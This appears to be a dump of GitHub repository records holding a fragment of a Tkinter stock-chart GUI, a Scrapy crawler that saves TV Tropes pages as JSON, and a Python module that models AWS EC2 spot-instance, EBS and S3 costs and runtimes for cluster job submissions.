PhotoImage(file = \"bgimage.png\")\nlabel = Label(imgframe, image = img)\nlabel.place(x=0, y=0, relheight=1, relwidth=1)\n\ndef q():\n root.quit()\n root.destroy()\n\nmainframe = Label(root)\nmainframe.pack()\n\nR1 = Radiobutton(mainframe, text=\"Open/Close\", variable=var, value=1,\n command=lambda:openclose()).pack()\nR2 = Radiobutton(mainframe, text=\"High/Low\", variable=var, value=2,\n command=lambda:highlow()).pack()\nR3 = Radiobutton(mainframe, text=\"Volume\", variable=var, value=3,\n command=lambda:vol()).pack()\nR4 = Radiobutton(mainframe, text=\"Simple Moving Average\", variable=var, value=4,\n command=lambda:sma()).pack()\nR5 = Radiobutton(mainframe, text=\"Bollinger Bands\", variable=var, value=5,\n command=lambda:bands()).pack()\n\n\nfinal = Text(mainframe)\nfinal.insert(END, str(analysis.iloc[:]))\nfinal.pack()\n\n\nquitbutton = Button(mainframe, text = \"QUIT\", command = q)\nquitbutton.pack()\n\nroot.mainloop()\n\nroot.destroy()" } ]
2
jmanuelrey/riws-crawler
https://github.com/jmanuelrey/riws-crawler
5ac5c166a667cd683d88ced4ce4bf49d3399752d
f325e95ed30754544f9579a64721d8081be6820b
44d1679795a3e98eba53e6f79298f4077f8a5ec9
refs/heads/master
2020-08-14T00:35:40.588386
2019-11-21T18:46:48
2019-11-21T18:46:48
215,064,779
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8048780560493469, "alphanum_fraction": 0.8048780560493469, "avg_line_length": 19.5, "blob_id": "d28136830bbd574da0140876f6cc11a7d5c8c88a", "content_id": "0153b0fbb0bd5364344a7f66bb74dcbe6e354550", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "permissive", "max_line_length": 25, "num_lines": 2, "path": "/README.md", "repo_name": "jmanuelrey/riws-crawler", "src_encoding": "UTF-8", "text": "# riws-crawler\nCrawler built with scrapy\n" }, { "alpha_fraction": 0.8133333325386047, "alphanum_fraction": 0.8133333325386047, "avg_line_length": 37, "blob_id": "57ed00ba62d2715b9983f0b31d557a64fb6cabeb", "content_id": "71dc3daa92a91dd235b45d8f6a370b30f5747a1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "permissive", "max_line_length": 48, "num_lines": 2, "path": "/crawler/spiders/main.py", "repo_name": "jmanuelrey/riws-crawler", "src_encoding": "UTF-8", "text": "from scrapy import cmdline\ncmdline.execute(\"scrapy crawl tvtropes\".split())" }, { "alpha_fraction": 0.6738373041152954, "alphanum_fraction": 0.6777299642562866, "avg_line_length": 30.09554100036621, "blob_id": "fc8ba17cb86e50c628f47042b01fd5ee35fc815a", "content_id": "49cb11883d07c9f32f19bc592f8eed8b37140a7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4881, "license_type": "permissive", "max_line_length": 314, "num_lines": 157, "path": "/crawler/spiders/tvtropes_spider.py", "repo_name": "jmanuelrey/riws-crawler", "src_encoding": "UTF-8", "text": "from goose3 import Goose\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.exceptions import CloseSpider\n\nimport re, os, json\n\nclass TvTropesSpider(CrawlSpider):\n\t# Nombre del crawler\n\tname = 'tvtropes'\n\t# Dominios permitidos\n\tallowed_domains = ['tvtropes.org']\n\t# URLs iniciales\n\tstart_urls = ['https://tvtropes.org/pmwiki/pagelist_having_pagetype_in_namespace.php?n=Main&t=trope&page=1']\n\t\n\t# Lista de medios\n\tmedia_list = ['Film', 'Series', 'Anime', 'Manga', 'VisualNovel', 'LightNovel', 'WesternAnimation', 'Disney', 'Animation', 'Toys', 'Literature', 'ComicBook', 'VideoGame', 'Website', 'Creator', 'Franchise', 'TabletopGame', 'Webcomic', 'Radio', 'Manhua', 'Manhwa', 'Music', 'Theatre', 'Myth', 'Ride'] # TODO rellenar\n\t\n\t# Reglas de crawling\n\trules = (\n\t\t# Extraer enlaces de 'Main' y 'Laconic'\n\t\tRule(\n\t\t\tLinkExtractor(\n\t\t\t\tallow=('pmwiki.php/Laconic')),\n\t\t\tcallback='parse_item',\n\t\t\tfollow=False),\n\t\tRule(\n\t\t\tLinkExtractor(\n\t\t\t\tallow=('pmwiki.php/Main')),\n\t\t\tcallback='parse_item',\n\t\t\tfollow=True),\n\t)\n\t\n\t# Contadores\n\titer_count = 0\n\ttrope_count = 0\n\tlaconic_count = 0\n\tnon_trope_count = 0\n\t\n\t# Crawlear MAX_COUNT paginas\n\t# Nota: no se crawlean *exactamente* MAX_COUNT paginas\n\tMAX_COUNT = 10000\n\tcustom_settings = {\n\t\t\t'CLOSESPIDER_PAGECOUNT': MAX_COUNT\n\t}\n\t\n\t# Obtener directorio actual\n\tcurrent_directory = os.getcwd()\n\t# Obtener carpeta 'data' dentro del directorio\n\tfinal_directory = os.path.join(current_directory, 'data/')\n\tos.mkdir(final_directory)\n\t\n\t# Crear archivos asociados a un tropo, en formato json\n\tdef create_files(self, json_file, file_name):\n\t\n\t\t# El nombre de la carpeta contenedora es de la forma 'titulo'-tropo o 'titulo'-laconic, \n\t\t# con los espacios del titulo sustituidos por guiones\n\t\tfile_dir = '{}-{}'.format(json_file['title'],file_name)\n\t\tfile_dir = file_dir.replace(\" \",\"-\")\n\t\t# Crear jerarquia de carpetas\n\t\t# Para cada elemento, se crea una carpeta 'data/tropo' y otra 'data/laconic' (si tiene)\n\t\t# La carpeta 'data' solo se crea la primera vez\n\t\tif not os.path.exists(os.path.join(self.final_directory, file_dir + '/')):\n\t\t\tos.makedirs(self.final_directory + file_dir + '/')\n\n\t\twith open(self.final_directory + file_dir + '/' + file_name + '.json', 'w+', encoding='utf-8') as fp:\n\t\t\tjson.dump(json_file, fp)\n\t\n\t# Generar objeto json con los datos del elemento\n\tdef generate_json(self, article):\n\t\n\t\ttitle = article.title\n\t\ttitle = title.replace(' / Laconic', '') ###\n\t\ttitle = title.replace('/', '-') ###\n\t\t\n\t\tcontent = article.cleaned_text\n\t\tlinks = article.links\n\t\tcurrent_url = article.canonical_link\n\t\t\n\t\tmedia_links = []\n\t\tnon_media_links = []\n\t\t\n\t\t# Para cada enlace extraido por goose\n\t\tfor(i, link) in enumerate(links):\n\t\t\tadded = False\n\t\t\t# Para cada medio posible\n\t\t\tfor media in self.media_list:\n\t\t\t# Si el enlace contiene uno de los medios, lo almacenamos en su lista\n\t\t\t\trx = \"pmwiki/pmwiki.php/(\"+media+\")/\"\n\t\t\t\t\n\t\t\t\tif(re.search(rx, link)):\n\t\t\t\t\tmedia_links.append(link)\n\t\t\t\t\tadded = True\n\t\t\t\t\tbreak\n\t\t\tif(not added):\n\t\t\t\t# Si el enlace no contiene ningun medio, lo almacenamos en otra\n\t\t\t\tnon_media_links.append(link)\n\t\t\n\t\tjson_file = {\n\t\t\t\"title\": title,\n\t\t\t\"content\": content,\n\t\t\t\"url\": current_url,\n\t\t\t\"media_links\": media_links,\n\t\t\t\"non_media_links\": non_media_links,\n\t\t}\n\t\t\n\t\treturn json_file\n\t\n\t# Parsear elemento\n\tdef parse_item(self, response):\n\t\n\t\tself.iter_count += 1\n\t\t\n\t\thtml = response.body\n\t\t\n\t\t# Objeto Goose para extraer datos de la pagina\n\t\tgoose_extractor = Goose()\n\t\tarticle = goose_extractor.extract(raw_html=html)\n\t\t\n\t\t# Comprobar que la pagina contenga (por lo menos) un header h2 con la palabra 'Examples', para saber si es un tropo o no\n\t\tif(response.css('h2').re('.Examples:.')):\n\t\t\tself.trope_count+=1\n\t\t\tfollow = True\n\t\t\tjson_file = self.generate_json(article)\n\t\t\tself.create_files(json_file, 'tropo')\n\t\t\t\n\t\t\t# Archivo para comprobar los tropos indexados\n\t\t\t#with open(self.final_directory + 'trope_list.txt', 'a+', encoding='utf-8') as fp:\n\t\t\t#\tfp.write(response.url+'\\n')\n\t\t\t\n\t\telse:\n\t\t\tself.non_trope_count += 1\n\t\t\tif('Laconic' in response.url):\n\t\t\t\tprint('Encontrado un Laconic!')\n\t\t\t\tself.laconic_count += 1\n\t\t\t\tjson_file = self.generate_json(article)\n\t\t\t\tself.create_files(json_file, 'laconic')\n\t\t\telse:\n\t\t\t\tprint('Enlace ignorado! (no era un tropo)')\n\t\t\tfollow = False\n\t\t\n\t\t# Cerrar objeto goose\n\t\tgoose_extractor.close()\n\t\t\n\n\t# Closed se llama cuando el spider termina de crawlear\n\tdef closed(self, reason):\n\t\tself.logger.info('Closed spider: %s' % reason)\n\t\tself.logger.info('Total iterations: %s' % self.iter_count)\n\t\tself.logger.info('Trope count: %s' % self.trope_count)\n\t\tself.logger.info('Laconic count: %s' % self.laconic_count)\n\t\tself.logger.info('Non-trope count: %s' % self.non_trope_count)\n\n''' Excepciones notables al formato habitual de tropo (no tienen ejemplos -> no es un tropo?):\nAbsurdism\nAbsurdlyCoolCity\n'''" } ]
3
computational-neuroimaging-lab/Clark2015_AWS
https://github.com/computational-neuroimaging-lab/Clark2015_AWS
6bfdd132a01f1845d4d6ef790ef54b94e2af64df
8928dcd44ff8210aedea08eb1d91e29c18ce0f4d
c35e05ec6fe40ecc87555568a2849c7e703a7914
refs/heads/master
2016-09-06T08:25:50.262526
2016-03-02T20:14:01
2016-03-02T20:14:01
35,069,173
8
2
null
2015-05-05T01:00:07
2015-05-26T15:06:10
2015-06-01T17:48:27
Python
[ { "alpha_fraction": 0.5790097117424011, "alphanum_fraction": 0.5969005227088928, "avg_line_length": 37.12165832519531, "blob_id": "3e83e6192a8f4205288d348021067b111da0d872", "content_id": "2c1bf5273f13047791aae3d87667565cf7216e15", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41362, "license_type": "permissive", "max_line_length": 87, "num_lines": 1085, "path": "/spot-model/spot_price_model.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot_price_model.py\n#\n# Contributing authors: Daniel Clark, Cameron Craddock, 2015\n\n'''\nThis module contains functions which return the total duration, cost,\nexpected failure time, expected wait time, and probability of failure\nfor a job submission to an AWS EC2 SPOT cluster\n'''\n\n# Calculate costs with the EBS model\ndef calc_s3_model_costs(run_time, wait_time, node_cost, first_iter_time,\n num_jobs, num_nodes, jobs_per, av_zone,\n in_gb, out_gb, up_rate, down_rate):\n '''\n Function to take results from the simulate_market function and\n calculate total costs and runtimes with data transfer and storage\n included for the S3-based storage model\n\n Parameters\n ----------\n run_time : float\n the total number of seconds all of the nodes were up running\n wait_time : float\n the total number of seconds spent waiting for the spot price\n to come down below bid\n node_cost : float\n the per-node running, or instance, cost\n first_iter_time : float\n the number of seconds the first job iteration took to complete;\n this is used to model when outputs begin downloading from EC2\n num_jobs : integer\n total number of jobs to run to complete job submission\n num_nodes : integer\n the number of nodes that the cluster uses to run job submission\n jobs_per : integer\n the number of jobs to run per node\n av_zone : string\n the AWS EC2 availability zone (sub-region) to get spot history\n from\n in_gb : float\n the total amount of input data for a particular job (in GB)\n out_gb : float\n the total amount of output data from a particular job (in GB)\n up_rate : float\n the average upload rate to transfer data to EC2 (in Mb/s)\n\n Returns\n -------\n total_cost : float\n the total amount of dollars the job submission cost\n instance_cost : float\n cost for running the instances, includes master and all slave\n nodes\n storage_cost : float\n cost associated with data storage\n xfer_cost : float\n cost associated with data transfer (out only as in is free)\n total_time : float\n the total amount of seconds for the entire job submission to\n complete\n run_time : float\n returns the input parameter run_time for convenience\n wait_time : float\n returns the input parameter wait_time for convenience\n xfer_up_time : float\n the amount of time it took to transfer the input data up to\n the master node (seconds)\n xfer_down_time : float\n the amount of time it took to transfer all of the output data\n from the master node (seconds)\n '''\n\n # Import packages\n import numpy as np\n\n # Init variables\n cpac_ami_gb = 30\n secs_per_avg_month = (365/12.0)*24*3600\n num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n # Upload speed from instance to S3 (mbps/8 bits/1000 MB in 1 GB)\n upl_to_s3_gbps = 100/8.0/1000.0\n\n # Get total execution time as sum of running and waiting times\n exec_time = run_time + wait_time\n\n ### Master runtime + storage time (EBS) + xfer time ###\n up_gb_per_sec = up_rate/8.0/1000.0\n xfer_up_time = num_jobs*(in_gb/up_gb_per_sec)\n\n # Get the number of jobs ran through n-1 iterations\n num_jobs_n1 = ((num_iter-1)*num_nodes*jobs_per)\n # Calculate how long it takes to transfer up all of the output data\n # *This is modeled as happening as the jobs finish during the full run\n # Sequential uploads at full bandwidth\n # (could be simultaneous uploads at 1/jobs_per bandwidth - same upl time)\n s3_upl_time_n1 = num_jobs_n1*(out_gb/upl_to_s3_gbps)\n exec_time_n1 = exec_time - first_iter_time\n residual_jobs = num_jobs - num_jobs_n1\n\n # End of upload of master node\n # 1) Transfer data up\n # 2) First iteration of running\n # 3) Rest of iteration runtimes, or all but last iteration's upload times..\n # ....whichever is greater\n # 4) Last iteration's (residual) upload times\n master_up_time = xfer_up_time + \\\n first_iter_time + \\\n np.max([exec_time_n1, s3_upl_time_n1]) + \\\n residual_jobs*(out_gb/upl_to_s3_gbps)\n\n # Get total transfer up time\n s3_upl_time = s3_upl_time_n1 + residual_jobs*(out_gb/upl_to_s3_gbps)\n\n ### Get EBS storage costs ###\n ebs_ssd = get_ec2_costs(av_zone, 'ssd')\n # EBS should only need to hold per-iteration jobs (rm complete as they go)\n ebs_nfs_gb = in_gb*num_jobs + num_nodes*jobs_per*out_gb\n # Get GB-months\n master_gb_months = (ebs_nfs_gb+cpac_ami_gb)*\\\n (3600.0*np.ceil(master_up_time/3600.0)/secs_per_avg_month)\n nodes_gb_months = num_nodes*cpac_ami_gb*\\\n (3600.0*np.ceil(run_time/3600.0)/secs_per_avg_month)\n ebs_storage_cost = ebs_ssd*(master_gb_months + nodes_gb_months)\n\n ### Get S3 storage/xfer/requests costs ###\n # Return pricing for each storage, transfer, and requests\n # Assuming out_gb stored on S3 for month, up to 1TB/month price\n # S3 storage\n stor_gb_month = get_s3_costs(av_zone, 'stor')\n down_gb_per_sec = down_rate/8.0/1000.0\n secs_to_download_s3 = (num_jobs*out_gb)/down_gb_per_sec\n s3_storage_cost = stor_gb_month*\\\n (secs_to_download_s3/secs_per_avg_month)*\\\n (num_jobs*out_gb)\n # S3 download requests\n # How many input/output files get generated per job\n # Assume ~2 for input\n in_ratio = 2\n # Assume ~50 for outupt\n out_ratio = 50\n req_prices = get_s3_costs(av_zone, 'req')\n s3_req_cost = req_prices['get']*((out_ratio*num_jobs)/10000.0)\n # S3 download transfer\n xfer_per_gb = get_s3_costs(av_zone, 'xfer')\n s3_xfer_cost = xfer_per_gb*(num_jobs*out_gb)\n\n # Sum of storage, transfer, and requests\n s3_cost = s3_storage_cost + s3_req_cost + s3_xfer_cost\n\n ### Get computation costs ###\n # Add in master node costs - asssumed to be on-demand, t2.small\n master_on_demand = get_ec2_costs(av_zone, 'master')\n master_cost = master_on_demand*np.ceil(master_up_time/3600.0)\n # Get cumulative cost for running N nodes per iteration\n nodes_cost = node_cost*num_nodes\n # Sum master and slave nodes for total computation cost\n instance_cost = master_cost + nodes_cost\n\n ### Data transfer in costs are free ###\n\n ### Total cost ###\n total_cost = instance_cost + ebs_storage_cost + s3_cost\n ### Total time ###\n total_time = master_up_time + secs_to_download_s3\n\n # Return data frame entries\n return total_cost, instance_cost, ebs_storage_cost, s3_cost, \\\n s3_storage_cost, s3_req_cost, s3_xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, s3_upl_time, secs_to_download_s3\n\n\n# Calculate costs with the EBS model\ndef calc_ebs_model_costs(run_time, wait_time, node_cost, first_iter_time,\n num_jobs, num_nodes, jobs_per, av_zone,\n in_gb, out_gb, out_gb_dl, up_rate, down_rate):\n '''\n Function to take results from the simulate_market function and\n calculate total costs and runtimes with data transfer and storage\n included for the EBS/EC2 storage model\n\n Parameters\n ----------\n run_time : float\n the total number of seconds all of the nodes were up running\n wait_time : float\n the total number of seconds spent waiting for the spot price\n to come down below bid\n node_cost : float\n the per-node running, or instance, cost\n first_iter_time : float\n the number of seconds the first job iteration took to complete;\n this is used to model when outputs begin downloading from EC2\n num_jobs : integer\n total number of jobs to run to complete job submission\n num_nodes : integer\n the number of nodes that the cluster uses to run job submission\n jobs_per : integer\n the number of jobs to run per node\n av_zone : string\n the AWS EC2 availability zone (sub-region) to get spot history\n from\n in_gb : float\n the total amount of input data for a particular job (in GB)\n out_gb : float\n the total amount of output data from a particular job (in GB)\n out_gb_dl : float\n the total amount of output data to download from EC2 (in GB)\n up_rate : float\n the average upload rate to transfer data to EC2 (in Mb/s)\n down_rate : float\n the average download rate to transfer data from EC2 (in Mb/s)\n\n Returns\n -------\n total_cost : float\n the total amount of dollars the job submission cost\n instance_cost : float\n cost for running the instances, includes master and all slave\n nodes\n storage_cost : float\n cost associated with data storage\n xfer_cost : float\n cost associated with data transfer (out only as in is free)\n total_time : float\n the total amount of seconds for the entire job submission to\n complete\n run_time : float\n returns the input parameter run_time for convenience\n wait_time : float\n returns the input parameter wait_time for convenience\n xfer_up_time : float\n the amount of time it took to transfer the input data up to\n the master node (seconds)\n xfer_down_time : float\n the amount of time it took to transfer all of the output data\n from the master node (seconds)\n '''\n\n # Import packages\n import numpy as np\n\n # Init variables\n cpac_ami_gb = 30\n secs_per_avg_month = (365/12.0)*24*3600\n num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n\n # Get total execution time as sum of running and waiting times\n exec_time = run_time + wait_time\n\n ### Master runtime + storage time (EBS) + xfer time ###\n up_gb_per_sec = up_rate/8.0/1000.0\n down_gb_per_sec = down_rate/8.0/1000.0\n xfer_up_time = num_jobs*(in_gb/up_gb_per_sec)\n\n # Get the number of jobs ran through n-1 iterations\n num_jobs_n1 = ((num_iter-1)*num_nodes*jobs_per)\n # Calculate how long it takes to transfer down all of the jobs\n # *This is modeled as happening as the jobs finish during the full run\n xfer_down_time_n1 = num_jobs_n1*(out_gb_dl/down_gb_per_sec)\n exec_time_n1 = exec_time - first_iter_time\n residual_jobs = num_jobs - num_jobs_n1\n\n # End of download of master node\n master_up_time = xfer_up_time + \\\n first_iter_time + \\\n np.max([exec_time_n1, xfer_down_time_n1]) + \\\n residual_jobs*(out_gb_dl/down_gb_per_sec)\n\n # Get total transfer down time\n xfer_down_time = xfer_down_time_n1 + residual_jobs*(out_gb_dl/down_gb_per_sec)\n\n ### Get EBS storage costs ###\n ebs_ssd = get_ec2_costs(av_zone, 'ssd')\n ebs_nfs_gb = num_jobs*(in_gb+out_gb)\n\n # Get GB-months\n master_gb_months = (ebs_nfs_gb+cpac_ami_gb)*\\\n (3600.0*np.ceil(master_up_time/3600.0)/secs_per_avg_month)\n nodes_gb_months = num_nodes*cpac_ami_gb*\\\n (3600.0*np.ceil(run_time/3600.0)/secs_per_avg_month)\n storage_cost = ebs_ssd*(master_gb_months + nodes_gb_months)\n\n ### Get computation costs ###\n # Add in master node costs - asssumed to be on-demand, t2.small\n master_on_demand = get_ec2_costs(av_zone, 'master')\n master_cost = master_on_demand*np.ceil(master_up_time/3600.0)\n # Get cumulative cost for running N nodes per iteration\n nodes_cost = node_cost*num_nodes\n # Sum master and slave nodes for total computation cost\n instance_cost = master_cost + nodes_cost\n\n ### Data transfer costs ###\n ec2_xfer_out = get_ec2_costs(av_zone, 'xfer')\n xfer_cost = ec2_xfer_out*(num_jobs*out_gb_dl)\n\n ### Total cost ###\n total_cost = instance_cost + storage_cost + xfer_cost\n ### Total time ###\n total_time = master_up_time\n\n # Return data frame entries\n return total_cost, instance_cost, storage_cost, xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, xfer_down_time\n\n\n# Calculate cost over interval\ndef calculate_cost(start_time, uptime_seconds, interp_history,\n interrupted=False):\n '''\n Function to calculate the runtime spot cost associated with an\n instance's spot history\n\n Parameters\n ----------\n start_time : datetime.datetime object\n start time of the spot history to calculate from\n uptime_seconds : float\n the number of seconds that the instance was running for\n interp_history : pandas.Series object\n the interpolated (second-resolution) spot history series,\n where the index is a timestamp and the values are prices\n interrupted : boolean (optional), default=False\n indicator of whether the instance was interrupted before\n terminating or not\n\n Returns\n -------\n total_cost : float\n the total amount of $ that the instance cost\n '''\n\n # Import packages\n import numpy as np\n import pandas as pd\n import datetime\n\n # Init variables\n pay_periods = np.ceil(uptime_seconds/3600.0)\n end_time = start_time + datetime.timedelta(seconds=uptime_seconds)\n hour_seq = pd.date_range(start_time, periods=pay_periods, freq='H')\n hourly_series = interp_history[hour_seq]\n\n # Sum up all but last hour price if interrupted\n total_cost = hourly_series[:-1].sum()\n\n # If the user ran residual time without interrupt after last hour\n if not interrupted:\n total_cost += hourly_series[-1]\n\n # Return the total cost\n return total_cost\n\n\n# Lookup tables for pricing for EBS\ndef get_ec2_costs(av_zone, cost_type):\n '''\n Function to retrieve costs associated with using EC2\n\n Data transfer into EC2 from the internet is free (all regions)\n\n Region name - Location mapping\n ------------------------------\n us-east-1 - N. Virginia\n us-west-1 - N. California\n us-west-2 - Oregon\n eu-west-1 - Ireland\n eu-central-1 - Frankfurt\n ap-southeast-1 - Singapore\n ap-southeast-2 - Sydney\n ap-northeast-1 - Tokyo\n sa-east-1 - Sao Paulo\n\n References\n ----------\n EC2 pricing: http://aws.amazon.com/ec2/pricing/\n EBS pricing: http://aws.amazon.com/ebs/pricing/\n\n Parameters\n ----------\n av_zone : string\n the availability zone to get the pricing info for\n cost_type : string\n the type of cost to extract, supported types include:\n 'ssd' - ssd EC2 EBS storage\n 'mag' - magnetic EC2 EBS storage\n 'xfer' - download from EC2 transfer costs\n 'master' - t2.small hourly on-demand cost\n\n Returns\n -------\n ec2_cost : float\n the $ amount per unit of the cost type of interest\n '''\n\n # Init variables\n region = av_zone[:-1]\n\n # EBS general purpose storage\n ebs_gen_purp = {'us-east-1' : 0.1,\n 'us-west-1' : 0.12,\n 'us-west-2' : 0.1,\n 'eu-west-1' : 0.11,\n 'eu-central-1' : 0.119,\n 'ap-southeast-1' : 0.12,\n 'ap-southeast-2' : 0.12,\n 'ap-northeast-1' : 0.12,\n 'sa-east-1' : 0.19}\n\n # EBS magnetic storage (plus same price per million I/O requests)\n ebs_mag = {'us-east-1' : 0.05,\n 'us-west-1' : 0.08,\n 'us-west-2' : 0.05,\n 'eu-west-1' : 0.055,\n 'eu-central-1' : 0.059,\n 'ap-southeast-1' : 0.08,\n 'ap-southeast-2' : 0.08,\n 'ap-northeast-1' : 0.08,\n 'sa-east-1' : 0.12}\n\n # Get costs for downloading data from EC2 (up to 10TB/month), in $/GB\n ec2_xfer_out = {'us-east-1' : 0.09,\n 'us-west-1' : 0.09,\n 'us-west-2' : 0.09,\n 'eu-west-1' : 0.09,\n 'eu-central-1' : 0.09,\n 'ap-southeast-1' : 0.12,\n 'ap-southeast-2' : 0.14,\n 'ap-northeast-1' : 0.14,\n 'sa-east-1' : 0.25}\n\n # Get $/hour costs of running t2.small master node\n ec2_t2_small = {'us-east-1' : 0.026,\n 'us-west-1' : 0.034,\n 'us-west-2' : 0.026,\n 'eu-west-1' : 0.028,\n 'eu-central-1' : 0.030,\n 'ap-southeast-1' : 0.040,\n 'ap-southeast-2' : 0.040,\n 'ap-northeast-1' : 0.040,\n 'sa-east-1' : 0.054}\n\n # Select costs type\n if cost_type == 'ssd':\n ec2_cost = ebs_gen_purp[region]\n elif cost_type == 'mag':\n ec2_cost = ebs_mag[region]\n elif cost_type == 'xfer':\n ec2_cost = ec2_xfer_out[region]\n elif cost_type == 'master':\n ec2_cost = ec2_t2_small[region]\n else:\n err_msg = 'cost_type argument does not support %s' % cost_type\n raise Exception(err_msg)\n\n # Return the ec2 cost\n return ec2_cost\n\n\n# Lookup tables for pricing for EBS\ndef get_s3_costs(av_zone, cost_type):\n '''\n Data transfer to S3 from anywhere is free (all regions)\n Data transfer from S3 to EC2 in same region is free (all regions)\n\n Parameters\n ----------\n av_zone : string\n the availability zone to get the pricing info for\n cost_type : string\n the type of cost to extract, supported types include:\n 'stor' - S3 standard storage per-GB-month\n 'xfer' - download from S3 transfer costs\n 'req' - bucket key requests cost\n\n Returns\n -------\n s3_price : float\n the $ amount per unit of the cost type of interest\n\n References\n ----------\n S3 pricing: http://aws.amazon.com/s3/pricing/\n '''\n\n # Init variables\n region = av_zone[:-1]\n\n # S3 standard storage (up to 1TB/month), units of $/GB-month\n s3_stor = {'us-east-1' : 0.03,\n 'us-west-1' : 0.033,\n 'us-west-2' : 0.03,\n 'eu-west-1' : 0.03,\n 'eu-central-1' : 0.0324,\n 'ap-southeast-1' : 0.03,\n 'ap-southeast-2' : 0.033,\n 'ap-northeast-1' : 0.033,\n 'sa-east-1' : 0.0408}\n\n # Get costs for downloading data from S3 (up to 10TB/month), in $/GB\n s3_xfer_out = {'us-east-1' : 0.09,\n 'us-west-1' : 0.09,\n 'us-west-2' : 0.09,\n 'eu-west-1' : 0.09,\n 'eu-central-1' : 0.09,\n 'ap-southeast-1' : 0.12,\n 'ap-southeast-2' : 0.14,\n 'ap-northeast-1' : 0.14,\n 'sa-east-1' : 0.25}\n\n # Request pricing (put vs get on S3)\n # Put - $/1,000 reqs (upload)\n # Get - $/10,000 reqs (download)\n s3_reqs = {'us-east-1' : {'put' : 0.005, 'get' : 0.004},\n 'us-west-1' : {'put' : 0.0055, 'get' : 0.0044},\n 'us-west-2' : {'put' : 0.005, 'get' : 0.004},\n 'eu-west-1' : {'put' : 0.005, 'get' : 0.004},\n 'eu-central-1' : {'put' : 0.0054, 'get' : 0.0043},\n 'ap-southeast-1' : {'put' : 0.005, 'get' : 0.004},\n 'ap-southeast-2' : {'put' : 0.0055, 'get' : 0.0044},\n 'ap-northeast-1' : {'put' : 0.0047, 'get' : 0.0037},\n 'sa-east-1' : {'put' : 0.007, 'get' : 0.0056}}\n\n # Select costs type\n if cost_type == 'stor':\n s3_cost = s3_stor[region]\n elif cost_type == 'xfer':\n s3_cost = s3_xfer_out[region]\n elif cost_type == 'req':\n s3_cost = s3_reqs[region]\n else:\n err_msg = 'cost_type argument does not support %s' % cost_type\n raise Exception(err_msg)\n\n # Return the ec2 cost\n return s3_cost\n\n\n# Find how often a number of jobs fails and its total cost\ndef simulate_market(start_time, spot_history, interp_history,\n proc_time, num_iter, bid_price):\n '''\n Function to find the total execution time, cost, and number of interrupts\n for a given job submission and bid price\n\n Parameters\n ----------\n start_time : pandas.tslib.Timestamp object\n the time to start the simulation from\n spot_history : pandas.core.series.Series object\n timeseries of spot prices recorded from AWS\n interp_history : pandas.core.series.Series object\n interpolated spot price history to one second resolution\n proc_time : float\n the time to process one job iteration (in seconds)\n num_iter : integer\n the number of job iterations or waves to run\n bid_price : float\n the spot bid price in dollars per hour\n\n Returns\n -------\n total_runtime : float\n the total number of seconds all of the nodes were up running\n total_wait : float\n the total number of seconds spent waiting for the spot price\n to come down below bid\n total_cost : float\n the per-node running, or instance, cost\n num_interrupts : integer\n the number of times the job submission was interrupted\n first_iter_time : float\n the number of seconds the first job iteration took to complete;\n this is used to model when outputs begin downloading from EC2\n '''\n\n # Import packages\n import datetime\n import numpy as np\n\n # Init variables\n total_runtime = 0\n total_wait = 0\n total_cost = 0\n num_interrupts = 0\n\n # Get first spot history start time\n # Note: np.argmax returns first occurence of True\n start_idx = np.argmax(spot_history.index >= start_time)\n spot_history_start = spot_history.index[start_idx]\n\n # Init remaining rumtime\n remaining_runtime = proc_time*num_iter\n\n # Init 1st iteration time\n first_iter_flg = False\n first_iter_time = 0\n\n # While there is time left running\n while remaining_runtime > 0:\n # Get only current spot history\n curr_spot_history = spot_history[spot_history_start:]\n\n # Get instance-boot-up price (per hour price at start time)\n start_price = interp_history[start_time]\n\n # If start price is greater than bid, interrupt immediately\n if start_price >= bid_price:\n uptime_seconds = 0\n interrupt_time = start_time\n # Otherwise, start instances\n else:\n # Find interrupts\n interrupt_condition = curr_spot_history >= bid_price\n\n # Find timestamp where first interrupt occured\n if np.any(interrupt_condition):\n interrupt_time = min(curr_spot_history.index[interrupt_condition])\n else:\n interrupt_time = spot_history.index[-1]\n\n # Calculate total up-and-running time\n uptime = interrupt_time - start_time\n uptime_seconds = uptime.total_seconds()\n\n # See if job completed\n if uptime_seconds > remaining_runtime:\n\n # Add remaining runtime to execution time\n total_runtime += remaining_runtime\n\n # Add remaining runtime costs\n total_cost += calculate_cost(start_time, remaining_runtime, interp_history)\n\n # Clear remaining run time\n remaining_runtime = 0\n\n # Job suspended until price returns below bid\n else:\n # Increment it as an interrupt if we were running before hand\n if uptime_seconds > 0:\n num_interrupts += 1\n\n # Add up time to execution time\n total_runtime += uptime_seconds\n\n # Add to cost\n total_cost += calculate_cost(start_time, uptime_seconds,\n interp_history, interrupted=True)\n\n # Subtract uptime from remaining runtime\n # Add back remainder of time that was interrupted (need to re-do)\n remaining_runtime = (remaining_runtime-uptime_seconds) + \\\n (uptime_seconds % proc_time)\n\n # Find next time the history dips below the bid price\n curr_spot_history = spot_history[interrupt_time:]\n start_condition = curr_spot_history < bid_price\n start_times = curr_spot_history.index[start_condition]\n\n # If we've run out of processing time\n if len(start_times) == 0 or \\\n start_times[0] == spot_history.index[-1]:\n err_msg = 'Job submission could not complete due to too many ' \\\n 'interrupts or starting too recently'\n raise Exception(err_msg)\n\n # Get the next time we can start\n spot_history_start = min(start_times)\n # and set as the next spot time\n start_time = spot_history_start\n\n # And increment wait time by (next start)-(this interrupt)\n total_wait += (start_time - interrupt_time).total_seconds()\n\n # Check to see if we're setting first iter\n if not first_iter_flg:\n # If we were up for at least one amount of processing time\n if total_runtime >= proc_time:\n first_iter_time = proc_time + total_wait\n first_iter_flag = True\n\n # Return results\n return total_runtime, total_wait, total_cost, num_interrupts, first_iter_time\n\n\n# Return a time series from csv data 